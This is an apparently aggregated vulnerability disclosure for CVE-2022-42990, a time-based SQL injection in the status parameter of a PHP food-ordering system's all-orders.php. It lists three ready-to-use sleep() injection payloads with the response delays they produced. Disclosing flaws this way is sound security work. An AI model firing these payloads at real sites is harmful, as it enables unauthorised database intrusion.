Headline

CVE-2022-42990: bug_report/SQLi-1.md at main · YorkLee2022/bug_report

Food Ordering Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /foms/all-orders.php?status=Cancelled%20by%20Customer.

1 year ago

CVE

Open in Source

#sql #vulnerability #php #auth

Permalink

Cannot retrieve contributors at this time

Food Ordering Management System v1.0 by oretnom23 has SQL injection

BUG_Author: YorkLee

vendors:https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html

Vulnerability File: /foms/all-orders.php

Vulnerability location: /foms/all-orders.php?status=Cancelled%20by%20Customer // Leak place —> status

status exists delayed injection vulnerability

Payload1: ?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(20)))a)%2b%27

select(sleep(20)) The server response time is 20 seconds

Payload2: ?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(15)))a)%2b%27

select(sleep(15)) The server response time is 15 seconds

Payload3: ?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(10)))a)%2b%27

select(sleep(10)) The server response time is 10 seconds

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

10 months ago

10 months ago

10 months ago

10 months ago

10 months ago